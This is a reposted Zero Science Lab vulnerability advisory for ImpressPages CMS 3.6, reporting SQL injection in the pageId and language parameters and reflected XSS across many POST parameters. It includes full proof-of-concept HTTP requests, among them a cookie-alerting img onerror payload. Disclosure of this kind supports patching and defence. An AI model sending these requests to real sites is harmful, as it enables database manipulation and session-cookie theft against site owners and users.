扫码分享
验证:
体验盒子ImpressPages CMS v3.6 Multiple XSS/SQLi Vulnerabilities
Vendor: ImpressPages UAB
Product web page: http://www.impresspages.org
Affected version: 3.6
Summary: ImpressPages CMS is an open source web content
management system with revolutionary drag & drop interface.
Desc: Input passed via several parameters is not properly
sanitized before being returned to the user or used in SQL
queries. This can be exploited to manipulate SQL queries by
injecting arbitrary SQL code and HTML/script code in a user's
browser session in context of an affected site.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Apache 2.4.2
PHP 5.4.7
MySQL 5.5.25a
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2013-5157
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5157.php
Vendor: http://www.impresspages.org/blog/impresspages-cms-3-7-is-mobile-as-never-before/
12.10.2013
--
==================================
SQL Injection: (pageId param)
POST /impresspages/?cms_action=manage HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 124
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://localhost
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost/impresspages/?cms_action=manage
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1
g=standard&m=content_management&a=getPageOptionsHtml&securityToken=c029f7293955df089676b78af8222d2a&pageId=64'&zoneName=menu1
==================================
SQL Injection: (language param)
POST /impresspages/admin.php?module_id=436&action=export&security_token=381cb48be4ed7445a9e6303e64ae87ac HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 404
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybBHOjmAcICeilnDe
Referer: http://localhost/impresspages/admin.php?module_id=436&security_token=381cb48be4ed7445a9e6303e64ae87ac
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1
------WebKitFormBoundarybBHOjmAcICeilnDe
Content-Disposition: form-data; name="language"
344'
------WebKitFormBoundarybBHOjmAcICeilnDe
Content-Disposition: form-data; name="spec_security_code"
9f1ff00ea8fd9fd8f2d421ba5ec45a18
------WebKitFormBoundarybBHOjmAcICeilnDe
Content-Disposition: form-data; name="spec_rand_name"
lib_php_form_standard_2_
------WebKitFormBoundarybBHOjmAcICeilnDe--
==================================
Reflected XSS POST parameters:
- files[0][file]
- instanceId
- pageOptions[buttonTitle]
- pageOptions[createdOn]
- pageOptions[description]
- pageOptions[keywords]
- pageOptions[lastModified]
- pageOptions[layout]
- pageOptions[pageTitle]
- pageOptions[redirectURL]
- pageOptions[rss]
- pageOptions[type]
- pageOptions[url]
- pageOptions[visible]
- revisionId
- widgetName
- pageSize[0]
- page[0]
- road[]
==================================
POST /impresspages/?cms_action=manage HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 155
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://localhost
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost/impresspages/?cms_action=manage
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1
g=standard&m=content_management&a=deleteWidget&securityToken=c029f7293955df089676b78af8222d2a&instanceId=<img%20src%3da%20onerror%3dalert(document.cookie)>
...
体验盒子
